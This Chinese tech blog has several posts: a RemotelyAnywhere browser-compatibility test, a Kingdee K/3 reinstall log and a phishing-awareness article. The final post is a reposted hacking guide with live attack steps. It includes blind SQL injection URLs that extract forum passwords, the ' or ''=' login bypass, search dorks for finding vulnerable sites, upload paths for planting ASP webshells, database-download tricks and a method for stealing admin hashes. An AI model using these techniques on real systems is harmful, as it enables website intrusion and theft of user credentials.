分类 : 网络日志 | 发表时间 06-09-2008
关键词: firefox , ie8 , 浏览器 , 登陆
早些年在管理远程服务器时,一直在使用微软的远程桌面连接程序,当然这个程序,到现在仍然是最快捷的连接方法,但不是最安全的,需要结合一下加密连接,比如ssl之类的加密通道,再远程桌面就完善了。自从使用了remotelyanywhere 之后,就很少使用微软的远程桌面了,可能微软的3389人们太熟悉了吧,整天有事没事就扫描这个端口。
Remotely Anywhere是一款强大的远程管理/控制工具,它可以在几乎所有的现在流行的windows平台上安装、稳定而有效地工作,Remotely Anywhere是一种基于HTTP协议的程序,将它安装在一台装有Windows系统的电脑上,你就可以在外地通过浏览器远程访问这台电脑了。当你远程登录该计算机后,可以通过浏览器管理计算机进程、用户、文件等信息。Remotely Anywhere使你能够对受控机器进行远程启动等关键操作,就像你自己在电脑前操纵机器一样。
现在最新的版本应该是RemotelyAnywhere 8.0.747,官方网站 有试用版本可以下载使用,如果找试用key,可到这里 搜索下载。
以前在使用ie5.5、ie6和ie7时,都可以正常的登陆连接使用,登陆后以后需要安装一下控件,这样各种功能就可以正常使用了,包括远程传输文件、远程桌面,很简便。但在安装了最近微软发布的ie8 beta2以后,连登陆界面都打不开了,只是有一个加密连接的提示,如果点击确认,就打开一个空白页面,似是ie8 beta2的加密连接功能不正常,调试安全选项,都不行;在精品技术论坛里面,也有人提到这个问题 ,但没有答案,跟帖问了下之后,几天也没有信息,后来实在不死心,也不想在系统里面再装虚拟机用了,干脆搬出来当前的几大浏览器轮番测试吧。
opera用了下,不行;activeX模式不能用,java模式连接一会,就断开,具体过程不多说了。
使用google的chrome,登陆倒是可以,但在安装控件提示时,点击安装一直没有反应(似是安装java控件);
登陆以后,远程时只能使用基于屏幕快照的html远程控制,也就是只能查看,不能操作了。没再多研究,新事务有太多不确定因素,不能浪费在这方面,还是找个稍微成熟点的吧!
用Firefox,登陆时有提示,连接证书之类的;
这样,登陆界面就可以出来了;并且登陆界面极似google的chrome,登陆后也是提示安装java控件,没问题,依照提示安装;这个控件似就是在ie下经常要安装的那个,这里提示的是:npRACtrl_ff3.xpi,看名称是专门针对Firefox3的。
后又提示到sun网站下载java控件,安装后重启FF,登陆,点远程控制,控制正常了。后来也试下,activeX连接模式,也正常了,奇怪,FF对activeX支持很一般哪,今天怎么这么顺利?有点晕,对FF也不是太熟,也许是哪个插件影响的吧。在用FF登陆remotelyanywhere时,有些提示的确定选择,还是要注意的,我一路测试过来,中间过程也记不太清楚了,如果你使用FF连接,可以随机应变选择。我测试的结果是,FF连接remotelyanywhere是没有问题的。之前我对这个结论还是持怀疑态度的,没想到被ie8 beta2逼迫着成功了。
微软的ie,这本来是你应用的天下,在你前进的路上,由于你的自大与轻视应用(也许是我使用ie不熟悉,但你不能要求使用ie的都是微软的认证专家吧?),ie的应用市场会慢慢的由新后来者蚕食而尽。
分类 : 网络日志 | 发表时间 20-08-2008
关键词: 分析 , 登陆 , 配置
昨天的历程提到了IBM服务器恢复系统过程中的一些问题 ,今天继续记录昨天的拯救之旅,今天的历程没有什么特殊的,只是昨天最后建立2003server vpn时,把那个“通过设置基本防火墙来对选择的接口进行保护 ”默认选择没有取消掉,造成外接口无法ping通,无法连接所有打开接口等,走了一些弯路,检查了许久,才发现这个点,取消掉,一切服务恢复OK。
金蝶K/3 10.4的安装,和以前版本确实有少许区别,大体上来说,还是检测环境,安装中间层、数据库部件等,安装后,注册中间层部件,恢复账套,恢复注册认证文件license.dat;但这个过程,有一个小小的插曲:
事先不知道,到安装金蝶服务器以后,在账套管理中恢复注册认证文件license.dat才知道,重新安装操作系统是要重新注册认证的,打电话联系金蝶的业务人员得知,重新认证这个过程需要最少两天,需要下载重新认证表,填写后盖章,然后送给经销商填写、盖章,传真至金蝶总部,等候处理。得知这一消息时,是下午4点多一点,给郑州金蝶的业务人员(这个人员是专门服务此企业的,对点服务)打电话说明情况,一定要今天认证下来,不然,断了两天的业务实在不能再耽搁了。业务人员唯唯诺诺的,不知所云;我说,我们尽快办手续到你们公司,二十分种就可以到,你最好给金蝶总部打个电话,让他们有关人员稍等一下(他说金蝶总部五点半准时下班)。五点不到十分,到郑州金蝶公司,稍等了一下,见到了这位业务人员,他让我们在会议室等一下,把表格拿着出去了;我和同事在会议室看着表在等着,眼看着五点四十了,业务人员推门进来,说今天办不成了。同事说,我们不到20分种到公司,这么长时间,怎么还申请不到?办事效率怎么这样?业务人员说,你以为呢?部门这么多,总得有手续才能办吧?我就说了:金蝶公司品牌大了,部门多了,应该是力量更大了,办事效能更高了,而不应该让部门多、公司发展成为推搪客户服务、给客户服务打折扣的理由?如果金蝶还是三级市场软件时,你还会这样态度吗?现在你说怎么办?一天二百多万的销售额,不能给客户送货,这损失,怎么办?就只因为金蝶的这个认证手续吗?难道各大公司使用金蝶,如果因为重新做系统、重新换内存等原因,都要扎住两天账不做了?这可能吗?这业务人员唯唯诺诺说,要么我们提供临时认证使用吧?事后得知,临时认证时间为一个月,客户端为5个,好在这5个已经可以解决燃煤之急了。在告诉他们新的软件认证号码后,发送过来了这个认证文件。
这个过程非常的不舒服,倒不是觉得金蝶的太过于品牌架子大,我们在搭乘电梯时,还是受到了金蝶一些业务人员的热情招呼的,但总觉得在这个过程中,金蝶没有为客户尽力服务,快速高效的解决问题,要知道金蝶现在所处的层面是很重要的,在解决问题、服务方面有所懈怠、有所折扣,这是对客户最大的伤害;同时,也是对金蝶自身的伤害。这里谢谢这位业务人员的配合,毕竟是解决了一些问题,同时,也希望你和金蝶这个服务团队能够更加的站在客户的立场上考虑和解决问题,这样,发展才会拥有无限潜力,当然,我们身为客户,是很理性的客户,不是蛮不讲理、胡搅蛮缠的客户。这是有本质区别的。
在安装金蝶中间层和数据库部件后,应该可以让客户端正常连接了,但以前可以正常连接的客户端在连接时,金蝶客户端在登陆时,出现“aotomation错误”,这个错误是金蝶的一个很古老、很经典的错误,在网上有无数的请求和解决方案,但我试了许久,都不得其门;最后看到了一篇帖子,灵光一闪,才解决了这个问题,至于其他解决思路,可以参考搜索引擎 那五花八门的解决方案 。金蝶社区的这个解决思路 ,完全不是那么回事。
在金蝶客户端登陆出现“aotomation错误”时,无意中想起来到“事件探查器”看一下系统日志,果有所获:
百度搜索“已禁用包含此组件或应用程序的组件 ”,这答案的确解决了我的这个问题–金蝶登陆,aotomation错误 。
在检查服务器上的系统日志,发现产生了一个错误日志:“激活 CLSID {3C4A2D54-FBB8-4262-A444-77ABFCA5B7F2} 失败,因为 COM+ 的远程激活被禁用。 要启用此功能,请使用配置您的服务器向导,并选择“Web 应用程序服务器”角色。”错误代码10014。 做以下的设置:打开控制面板-添加/删除程序-Windows组件-Application Server-启用网络 COM+ 访问 , 确定。立即重新运行客户端测试,问题解决!
另外,金蝶的那个客户端权限账户需要在服务器上同样存在这个做法,的确是很弱智(终于切中题目了),我经历了很多大公司的金蝶财务布置署了,都是在网内给财务建立相同的管理权限,这样金蝶财务软件的确可以正常运行,但金蝶服务器的安全,各使用金蝶客户端自身的安全就非常脆弱,完全是依靠公司内的信任度来保障这么重要数据的安全。这么多年了,这么大的财会软件品牌了,还有这问题?想不通,是没给客户布署完整?还是有什么不由衷的原因?有哪位有完善的保障解决方案,请留言给我。
另外,如果在登陆时,填写用户名和密码提交时,提示network用户访问权限之类的提示,这是因为对数据库的访问权限有问题,修改这里就好了;
最后,总算可以正常使用了。并且在测试中发现,服务器上建立user组的客户端对应账户权限就可以让金蝶客户端正常登陆。但这还不满足,还极不完整,还需要进一步加强。
说的这些有不符合实情的地方,欢迎留言指教。希望你的实战经验能够给我最切实的方便。
分类 : 技术文摘 | 发表时间 08-08-2006
关键词: asp , data , discuz , hi , hp , ie , linux , mysql , php , phpwind , sp2 , sql , TM , windows , xp , 下载 , 乱码 , 代码 , 升级 , 图片 , 安全 , 安装 , 密码 , 工具 , 插件 , 数据库 , 数据恢复 , 服务 , 服务器 , 流量 , 测试 , 浏览器 , 登陆 , 程序 , 统计 , 自动 , 论坛 , 资料 , 软件 , 配置 , 错误 , 问题
分类 : 系统安全 | 发表时间 14-06-2006
关键词: bbs , hi , ie , qq , TM , 下载 , 代码 , 免费 , 分析 , 商务 , 图片 , 域名 , 安全 , 密码 , 工商银行 , 微软 , 手机 , 技术 , 提高 , 搜索 , 攻击 , 显示 , 服务 , 服务器 , 木马 , 汽车 , 浏览器 , 淘宝 , 游戏 , 漏洞 , 电子商务 , 电话号码 , 病毒 , 登陆 , 短信 , 破解 , 程序 , 网上银行 , 网站 , 网络 , 自动 , 补丁 , 软件 , 邮箱 , 银行 , 链接 , 黑客 , 鼠标
近年来各式各样的网络诈骗案件层出不穷,假冒工商银行、假冒购物网站不知夺取了多少人的血汗钱,针对这一现象,有人形象地称之为“网络钓鱼”,很不幸的是,不法分子利用我们的疏忽屡屡得逞,今天笔者整理出目前最常用的网络钓鱼的八种作案手法,希望大家能够引以为戒,擦亮双眼,保护好自己的网络。愿者上钩 什么是网络钓鱼 网络钓鱼(Phishing)一词,是“Fishing”和“Phone”的综合体,由于黑客始祖起初是以电话作案,所以用“Ph”来取代“F”,创造了“Phishing”。 “网络钓鱼”攻击利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动,受骗者往往会泄露自己的财务数据,如信用卡号、账户用户名、口令和社保编号等内容。诈骗者通常会将自己伪装成知名银行、在线零售商和信用卡公司等可信的品牌,在所有接触诈骗信息的用户中,有高达5%的人都会对这些骗局做出响应。 在美国和英国已经开始出现专门反网络钓鱼的组织,越来越多在线企业、技术公司、安全机构加入到反“网络钓鱼”组织的行列,比如微软、戴尔都宣布设立专案分析师或推出用户教育计划,微软还捐出4.6万美元的软件,协助防治“网络钓鱼”。 网络钓鱼最常用的八大作案手法汇总介绍: 1、网上拍卖不给商品 美国联邦贸易委员会最新公布的《扫荡网络诈骗》报告中,列举了全球十大最流行、最猖獗的网上欺诈手法,其中以网上拍卖名列榜首,受害人大多数是中标付款后却收不到商品。据2002美国全国消费者协会调查,去年一年,美国有41%的网上拍卖交易买方投诉被骗,人均损失326美元。而据IFCC调查,网上拍卖活动中发生的诈骗案件占全部网上诈骗案件的43%。 这种最直白的行谝手法居然在我国也大行其道。山东泰安的王先生,他在雅宝拍卖网上通过网上竞价的方式购买了一部Nokia8810手机。汇款给卖主后,王先生就和这位名叫“kiss590069”的物主失去了联系。后经调查发现:这位“kiss590069”还通过类似的方法,骗取了另外四位网友的钱。在警方的介入下,才得以挽回了损失。类似的案例在网上比比皆是。 ·别上钩 网络钓鱼最常用八大作案手法 2、发送电子邮件以虚假信息引诱用户中圈套 如去年2月份发现的一种骗取美邦银行(SmithBarney)用户帐号和密码的“网络钓鱼”电子邮件,该邮件利用了IE的图片映射地址欺骗漏洞,并精心设计脚本程序,用一个显示假地址的弹出窗口遮挡住了IE浏览器的地址栏,使用户无法看到此网站的真实地址。当用户使用未打补丁的Outlook打开此邮件时,状态栏显示的链接是虚假的。 当用户点击链接时,实际连接的是钓鱼网站http://**.41.155.60:87/s。该网站页面酷似SmithBarney银行网站的登陆界面,用户一旦输入了自己的帐号密码,这些信息就会被黑客窃取。 3、建立假冒网站骗取用户帐号密码实施盗窃 犯罪分子建立起域名和网页内容都与真正的网上银行系统、网上证券交易平台极为相似的网站,引诱用户输入账号密码等信息,进而通过真正的网上银行、网上证券系统或者伪造银行储蓄卡、证券交易卡盗窃资金;还有的利用跨站脚本,即利用合法网站服务器程序上的漏洞,在站点的某些网页中插入恶意Html代码,屏蔽住一些可以用来辨别网站真假的重要信息,来窃取用户的真实信息。 例如,曾出现过的某假冒银行网站,网址为1cbc.com.cn。而真正银行网站是icbc.com.cn,犯罪分子利用数字1和字母i非常相近的特点企图蒙蔽粗心的用户。 又如2004年7月发现的某假网站(网址为1enovo.com)而真网站的网址为lenovo.com,诈骗者利用了小写字母l和数字1很相近的障眼法。通过QQ散布“XX集团和XX公司联合赠送QQ币”的虚假消息,引诱用户访问该假网站。 用户一旦访问该网站,首先生成一个弹出窗口,上面显示“免费赠送QQ币”的虚假消息。而就在该弹出窗口出现的同时,恶意网站的主页面就会在后台通过多种IE漏洞下载病毒程序lenovo.exe(TrojanDownloader.Rlay),并在2秒钟后自动转回到真正的网站主页,使用户在毫无觉察中就感染了病毒。 病毒程序执行后,将下载该网站上的另一个病毒程序bbs5.exe,用来窃取用户的传奇帐号、密码和游戏装备。当用户通过QQ聊天时,还会自动发送包含恶意网址的消息。 4、利用虚假的电子商务进行诈骗 从事这类网络诈骗活动的不法分子,大都采用在知名电子商务网站如“易趣”、“淘宝”、“阿里巴巴”等,发布虚假信息,以所谓“超低价”、“免税”、“走私货”、“慈善义卖”的名义出售各种商品。很多人在他们低价的诱惑下上当受骗。 由于网上交易多是异地交易,通常需要汇款。不法分子一般要求消费者先付部分款,再以各种理由诱骗消费者付余款或者其他各种名目的款项,等到钱款或他们的伎俩被识破时,就立即切断与消费者的联系。 ·别上钩 网络钓鱼最常用八大作案手法 5、利用木马和黑客技术窃取用户信息后实施盗窃 木马制作者通过发送邮件或在网站中隐藏木马等方式大肆传播木马程序,当感染木马的用户进行网上交易时,木马程序即以键盘记录的方式获取用户账号和密码,并发送给指定邮箱,用户资金必然受到严重威胁。 去年网上出现的、盗取某银行个人网上银行帐号和密码的木马Troj_HidWebmon及其变种,它甚至可以盗取用户数字证书。又如去年出现的木马“证券大盗”,它可以通过屏幕快照将用户的网页登录界面保存为图片,并发送给指定邮箱。黑客通过对照图片中鼠标的点击位置,就很有可能破译出用户的账号和密码,从而突破软键盘密码保护技术,严重威胁网上证券交易安全。 6、网址欺骗 网址欺骗是网络骗子利用人们很难记住众多网址的特点,采用以假乱真的手法进行的又一种“网络钓鱼”诈骗活动,中国一名捐款者用搜索引擎查找到一个名为“中华慈善总会”的网站chinacharity.cn.net,结果却发现真网址应该为chinacharity.cn。前者比后者只多了个net,已经完全到了以假乱真的地步。 7、利用用户弱口令等漏洞破解猜测用户帐号和密码 不法分子利用部分用户贪图方便的特点,在一些网站设置弱口令的漏洞,对银行卡密码进行破解。如2004年10月,三名犯罪分子从网上搜寻到某银行储蓄卡卡号,然后登陆该银行网上银行网站,尝试破解了弱口令,并屡屡得手。 8、利用手机短信进行诈骗 手机的普及使犯罪分子觉得利用手机短信进行诈骗,十分方便而又快捷。于是,近年来利用手机短信进行诈骗的活动猖獗起来。由一部储存着手机号码的电脑控制的“群发器”,平均3秒就发出一条短信息。 而更令人震惊的是,被视为高度机密、连警方办案都提取不到的各省市移动电话号码分段表,在犯罪分子的电脑里居然可以查到。不仅如此,作案者的电脑里的控制软件还有自动识别功能。尾数为“8888”等吉利数
字的手机,给它发出的短信“中奖奖品”起码是一辆汽车。软件设计者显然知道,用数字吉利的电话号码者多是有钱人。而这些犯罪嫌疑人利用自制的手机短信群发器,在1分钟内就可以向全国各地发出一万条诈骗信息,如果一万个人中有几个人上当,他们的收入就很可观了。 小结: 也许有人会感觉这种“网络钓鱼”防不胜防,因为它们实在太逼真、太具有诱惑力了,不法分子恰恰抓住了我们疏于防范,喜欢贪图小便宜的弱点。所以,提高警惕是我们最好的解决办法,对来历不明的邮件、弹出的网页或陌生人的短消息都要格外注意,千万别上钩。
分类 : 系统安全 | 发表时间 13-06-2006
关键词: asp , baidu , bbs , blog , cookie , css , data , flash , google , hp , ie , md5 , microsoft , php , phpwind , pr , server , sp2 , sql , TM , webshell , xp , 下载 , 主题 , 代码 , 入侵 , 共享 , 关键词 , 分析 , 动网 , 原理 , 友情链接 , 后门 , 安全 , 密码 , 工具 , 广告 , 搜索 , 数据库 , 新闻 , 显示 , 服务 , 服务器 , 木马 , 正式版 , 注册 , 测试 , 漏洞 , 病毒 , 登陆 , 百度 , 破解 , 程序 , 编码 , 网站 , 自动 , 认证 , 论坛 , 资料 , 软件 , 链接 , 错误 , 问题 , 限制 , 黑客
信息来源:慕容小雨’s blog 慕容小雨何许人也,偶不认识,不过听neeao说过多次,再从作品上看,当非凡人也!呵 各种漏洞的利用和一些搜索参数 说到漏洞,首先应该提到的就是动网的上传漏洞了。 “洞网”漏洞拉开了上传漏洞文件的序幕,其他系统的上 传漏洞接踵而来! asp动网论坛漏洞分析 1、这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的。例子说明一下,在发帖时写入[img]javasx63ript:window.open(‘httx70://www.fwcn.com’,”)[/img] 很清楚地看到,#x63解码的字母是”c”,#x70解码的字母是”p”,&起到连接作用,最后加上[img],使JS被触发,如果论坛支持flash插入,用[swf]也可。利用这个漏洞可以搞些恶作剧,写上诱人的主题,点进去结果是他的主页(骗点击率,作广告),甚至更绝,连到一个有病毒、木马的网页上,让你直想骂娘。这个漏洞存在于动网的各个版本,包括较新的0519版,覆盖面积之广让人瞠目,各人认为应该对某些非法字符进行检测剔除,而非简简单单地拆分了事,真希望动网开发者能尽早补上这漏洞。 2、比起前者,第二个漏洞问题就大啦,利用该漏洞可以破解掉论坛上所有注册会员的密码(恐怖~~~),由于论坛管理员通常直接把论坛程序载下来梢加以美工就拿来使用了,图方便直接导致了漏洞的出现,我们也载一个回来,只要看一下动网的数据库,就知道了密码的字段为userpassword,接着例如要破一个名叫abc的用户密码,首先察看abc的用户资料,给出的连接是http://xxxxx/dispuser.asp?name=abc ,在dispuser.asp中,读取参数的语句是:username=trim(request(“name”)),数据库的查询的语句是: sql=”select * from [user] where username=’”&username&”‘”,看得出来, abc就是直接被作为了dispuer的一个参数username,另外,如果该用户不存在,程序就会给出提示,既然如此,我们就再写入个查询密码的条件,在where username=abc后面加上and userpassword=”******”,理论上这样就可以实现对密码的破解了,但这么破要破到何年何月,现在就要轮到VBS函数大显身手了,可以先用len函数试出用户的密码位数,地址就这么写http://xxxxx/dispuser.asp?name=abc'%20and%20len(userpassword)=5%20and%20’1′=’1,这么看可能不好理解,放到sql语句里其实就是这副样子:sql=”select * from [User] where username=’abc’ and len(UserPassword)=5 and ’1′=’1′”,现在明白点了吧,%20是空格,abc后面的单引号和’1′=’1里的单引号都是为了和sql语句相匹配。奇怪,该用户不存在,喔?那就说明符合这个条件的用户没有,继续,把5换成6,7,8,依此类推,只要能显示出用户资料了,就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了,继续要用到VBS,可以用left或right或mid函数,http://xxxxx/dispuser.asp?name=abc'%20and%20left(userpassword,1)=’a,如果猜对了就给出用户资料,猜对了就给出该用户不存在的提示,这样子还是嫌太慢,那就在外面再套个asc函数,http://xxxxx/dispuser.asp?name=abc'%20and%20asc(mid(userpassword,1,1))>’50 试出用户密码的ASCII码是否大于50,不断地缩小范围,相信很快就能将范围缩小至个位数,看到这里你是否惊出了一身冷汗,起码我是如此,*几个函数的灵活运用,保守地说,不出半小时就能破解出密码。真是不幸中的大幸,动网开发者在后来的05**版后使用了MD5的加密,这下子总算放心了,但介于国内还有许多地方在使用老版本的动网论坛(包括一个小有名气的flash站点) 3 、动网SQL语句漏洞 此漏洞针对动网SQL版本。 测试方法:在http://ip/bbs/admin_index.asp 输入用户名是’or”=’ 密码也是这个 这样可以跳过认证 原理:利用SQL语法。输入的密码和ID就成为一个合法的SQL语句,直接跳过认证。 此漏洞并不针对动网。很多SQL的ASP都会有这个漏洞 4、动网论坛sp2漏洞 (此漏洞影响范围甚大,动网官方站、黑客防线、安全基地都曾因此被黑过,具体资料大家可以在百度搜一下) 上传漏洞路径:reg_upload.asp及upfile.asp 青创文章系统 打开google 输入.tw qcdn (或者是去百度搜索 Powered by:QCDN_NEWS 但大多数是中国的) 青创文章系统 上传漏洞。在网址后加/admin_upfile.asp 如果出现。 Microsoft VBScript 磅︽顶琿岿粇 岿粇 ’800a01b6′ ンぃや穿妮┦┪よ猭: ‘form’ /article/admin_upfile.asp, 21 就代表已经有90%以上的希望了 桂林老兵的上传工具上传木马 入侵的時候發現admin_upfile.asp改了。你也可以改成user_upfile.asp也上傳傳馬馬。還有一個方法就是把admin_upfile.asp user_upfile.asp加到注入工裏邊 青创文章管理系统注入功击 关键字”list.asp?unid=” 工具: 1、NBSI好像大部分黑客站点都有得下。 2、MD5Crack2,破解MD5加密的软件(磊子推荐:dos下DV.exe比较好用) 第一次检测的时候,会报告”暂未检测到注入漏洞”;然后在”特征字符”输入”Unid” (提示:”Unid”中的” U “一定要是大写的 “飞龙文章管理系统” 漏洞 飞龙文章管理系统 Ver 2.0 Build 20040620 正式版漏洞利用 搜索”Article.asp?ArtID=”关键字 漏洞文件在 admin_upfile.asp user_upfile.asp 这两个文件”upfile.asp” 动网漏洞的再现 上传时cookie中加”ArtID=1111;” phpwind 1.3.6 的论坛漏洞的利用 搜索关键字”POWER BY PHPWIND v1.3.6″ phpwind1.3.6论坛利用程序 “群共享”中有上传 保存后,木马地址为当前目录下的faq.php 在本机用如下表单进行提交:
METHOD=”POST”>
上传成功后的木马存在论坛目录下 直接访问就行! 漏洞集合 1)Co Net MiB Ver1.0~4.0 用’or’='or’登陆管理员(一个比较经典的漏洞) 2)ASP Calendar漏洞 请在google搜索Maintained with the Ocean12 ASP Calendar Manager v1.01这个信息,程序的默认数据库为o12cal.mdb(非MD5加密,明文保存) 3)六合彩漏洞 我们打开www.baidu.com或是www.google.com 在搜索里输入 请各位验证会员料 http://www.3589.com/tian/4login.asp把4login.asp改成conn.inc <%DBPath=Server.MapPath("wz520#.mdb") Set conn=Server.CreateObject(“ADODB.Connection”) conn.Open “Driver={Microsoft Access Driver (*.mdb)};DBQ=”&DBPath%> wz520#.mdb,他就是数据库了。#改成%23就可以下载数据库了 4)青创文章系统出现严重漏洞 在网址后加/admin_upfile.asp上传WEBSHELL 百度搜索 Powered by:QCDN_NEWS 台湾.tw qcdn。 还可以用%5c暴库,通杀 “list.asp?unid=” ” .tw/list.asp?unid= ” 存在注入 在”特征字符”输入”Unid” (”Unid”中的” U “一定要是大写的) 5)自由动力3.6的软件上传过滤不严 用WinHex.exe和WSockExpert.exe修改上传木马 E时代驿站漏洞 百度搜索”E时代驿站” 漏洞利用页面 /upload.asp 用老
兵直接上传 沸腾新闻系统上传漏洞 搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用 漏洞:没有对空格进行严格的限制。 所以,我们直接选定要上传的asp木马,然后在后面加上空格 它的上传文件是UploadFaceOK.asp 尘缘雅境 在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看 到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页 是http://www.xx.com/asfq/index.asp,那么就要这样填写 http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目 录]:/asfq/admin (注意一定要加上admin),[漏洞文件]一般不用改,不过有 些老版的 尘缘系统 的漏洞文件是uploadok.asp,如果uploadfaceok.asp不成功 再改 OFSTAR论坛漏洞利用程序(群共享中) 搜索: powered by ofstar.net 1:输入管理员用户名 2:输入任意一个帖子的路径! 3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的! 4:单击直接登陆按钮!程序会自动构造Cookies进行登陆!单击管理栏的”超管”可直接进入后台! 上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样) 然后使用提交页面提交“可以直接拿到shell!